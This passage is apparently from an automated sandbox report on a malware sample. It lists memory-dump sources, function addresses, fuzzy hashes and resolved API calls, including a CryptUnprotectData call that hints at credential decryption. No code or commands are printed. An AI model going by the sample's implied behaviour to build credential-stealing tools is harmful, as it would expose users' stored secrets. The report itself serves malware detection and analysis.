                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: BY7{$cAy}$u9>]
                                  • API String ID: 0-1575426848
                                  • Opcode ID: 03c4f7b90a97e84bbddb548d0349b3e55bb71f51c572466806f09cd3026ae274
                                  • Instruction ID: eac431aabc1c148568849b5f799276df605d18b3f4888d69792a88c95d2466ec
                                  • Opcode Fuzzy Hash: 03c4f7b90a97e84bbddb548d0349b3e55bb71f51c572466806f09cd3026ae274
                                  • Instruction Fuzzy Hash: B9B2D5F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A493DE6C4C3744EA7558418697
                                  Function 008FA637 Relevance: 5.0, Strings: 3, Instructions: 1261COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (!0$W-$f~
                                  • API String ID: 0-3915272384
                                  • Opcode ID: 3a54455dbc1595c6d68655a143a22060ecfbf6a5d6fecfd6f9208462a4faf09a
                                  • Instruction ID: f9e72372a7c40e9f385def30f43076feefb5378118179e6c93a0ee77887925dd
                                  • Opcode Fuzzy Hash: 3a54455dbc1595c6d68655a143a22060ecfbf6a5d6fecfd6f9208462a4faf09a
                                  • Instruction Fuzzy Hash: E88209F3A0C2049FE704AE29EC8567AFBE5EF94320F16493DEAC5C3744EA3558058697
                                  Function 00543720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(0054E118,00000000,00000001,0054E108,00000000), ref: 00543758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005437B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 9d09c5655e7a064736d04503174663be60c33b44d550f82f35ac2b1b59e22a4e
                                  • Instruction ID: 1da349a7cf89812e95c472c867ee19adebb0ab54d614ecfa869474bdc63536fa
                                  • Opcode Fuzzy Hash: 9d09c5655e7a064736d04503174663be60c33b44d550f82f35ac2b1b59e22a4e
                                  • Instruction Fuzzy Hash: 0B41F970A40A189FDB24DB58CC95BDBB7B4BB48706F4091D8E608A72A0E7716EC5CF50
                                  Function 00539B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00539B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00539BA3
                                  • LocalFree.KERNEL32(?), ref: 00539BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 006660db7c551b5e27c26da476ea36b6563d6b232cd452c2aff875eb6e98f9bd
                                  • Instruction ID: 4db3004b1130997ebec80b16e3b191f3733313abd7a125a3f0845a9b3a4d1a9f
                                  • Opcode Fuzzy Hash: 006660db7c551b5e27c26da476ea36b6563d6b232cd452c2aff875eb6e98f9bd
                                  • Instruction Fuzzy Hash: AC11CCB8A00209EFDB04DF94D985EAEB7B9FF88300F104558E91597350D774AE50CFA1
                                  Function 00900BA0 Relevance: 4.1, Strings: 2, Instructions: 1631COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: AC_;$tQU-
                                  • API String ID: 0-212051768
                                  • Opcode ID: 1d2d68111f70096091e2b3612bde1adc46692661ad959a668173d7dbce3376e0
                                  • Instruction ID: b6401295a0c2c9e5f031bc04dd24526309a6748afd57ac27262a59d09631c683
                                  • Opcode Fuzzy Hash: 1d2d68111f70096091e2b3612bde1adc46692661ad959a668173d7dbce3376e0
                                  • Instruction Fuzzy Hash: B5B218F3A082109FE704AE2DEC4567ABBE9EFD4720F1A853DEAC4C3744E53598058796
                                  Function 0081EF62 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: wCg$zy.
                                  • API String ID: 0-2400310284
                                  • Opcode ID: f7995d1a994f1e2348c8624e54e096255e267dc0378417fa818b5d3c89185701
                                  • Instruction ID: eff4aaf7e18da01f4129388313f734958f630600b9adaacff8592a6b74cdd042
                                  • Opcode Fuzzy Hash: f7995d1a994f1e2348c8624e54e096255e267dc0378417fa818b5d3c89185701
                                  • Instruction Fuzzy Hash: AE4106F2608308AFE3046E1DEC81BABF7D6EBD4724F15C53DE6C452344EA3969048696
                                  Function 0084B1E2 Relevance: .2, Instructions: 209COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef5a0be87170a4d66d09d8893a12b879e0fd5115f0bbc4887416e403251dcdbf
                                  • Instruction ID: 1224d78c9338bf9673421628ae3e76881ebdf8f8e970151c99c6b666c7da7e86
                                  • Opcode Fuzzy Hash: ef5a0be87170a4d66d09d8893a12b879e0fd5115f0bbc4887416e403251dcdbf
                                  • Instruction Fuzzy Hash: 3751EFB3E081205BF3445A3DDC0976AB7D69BD4720F2B863DDA88E77C4E9399D054281
                                  Function 00881745 Relevance: .2, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f32d91e667731620ff83f3126b8c5b7d45257e9199875e3f7cfaed31d1f6bf8
                                  • Instruction ID: becc957eb3480bb4e00928ebff45ffc28b5a537eb8402b8994151c356756a41a
                                  • Opcode Fuzzy Hash: 1f32d91e667731620ff83f3126b8c5b7d45257e9199875e3f7cfaed31d1f6bf8
                                  • Instruction Fuzzy Hash: 595169F3A082049FE308AE7CEC44777B7DAEBD0210F1A863DE985D3748E9719D058686
                                  Function 008EF9B7 Relevance: .2, Instructions: 185COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e75064dd7227314b9ab46295f5902b8aaa135b690cc9cd01f6ae3c67cf528c29
                                  • Instruction ID: ec02138b82012026a9b3662f9c69c10f1aa8fb1b1b821d5f42c1c882f9722110
                                  • Opcode Fuzzy Hash: e75064dd7227314b9ab46295f5902b8aaa135b690cc9cd01f6ae3c67cf528c29
                                  • Instruction Fuzzy Hash: 405157F3B053185BE304692DDCD837AB6DAEBE4360F2B863DCA8587784E93A1C054291
                                  Function 0081B0A6 Relevance: .2, Instructions: 171COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5178c9d7eea0d45632a0a477ace117da16dd62cbbf898329837c191e2bdd1e02
                                  • Instruction ID: 400af9343d5bb1155345412e0ef44d361e2ac092719e0a203e477b3d53487051
                                  • Opcode Fuzzy Hash: 5178c9d7eea0d45632a0a477ace117da16dd62cbbf898329837c191e2bdd1e02
                                  • Instruction Fuzzy Hash: E35127F3A182005BE3106A29DC857ABB7D6EFD4720F1A853DEBD483744EE3998058687
                                  Function 008222FE Relevance: .2, Instructions: 160COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 967f987117a374570d0077c31071536a4f715f09350791eb1f9220a151ce4956
                                  • Instruction ID: 4af74099220406cfe69e7db3ed6ef597712bb995cc11385b3f8e8044e771d263
                                  • Opcode Fuzzy Hash: 967f987117a374570d0077c31071536a4f715f09350791eb1f9220a151ce4956
                                  • Instruction Fuzzy Hash: DD413CF3A192105BF308A938EDD57BBB6D6EBD4320F1AC53DD685D7B88D838490182D6
                                  Function 007DFD84 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a70b4e71cb9fb35e0e8ff95bc75ba44e438fdf6719651e54f3139d82b5bd039
                                  • Instruction ID: aa3f60f8e397c3ddccff19febcf8a8ee62ffebc3115b91330f118b1fa0d89c6b
                                  • Opcode Fuzzy Hash: 2a70b4e71cb9fb35e0e8ff95bc75ba44e438fdf6719651e54f3139d82b5bd039
                                  • Instruction Fuzzy Hash: 094125F3F185104BF314992DDC4536A76D6D7D4321F2B863EDB99DB7C8E83988064289
                                  Function 007CD1AD Relevance: .1, Instructions: 143COMMON
                                  Download Yara Rule
                                  Memory Dump Source
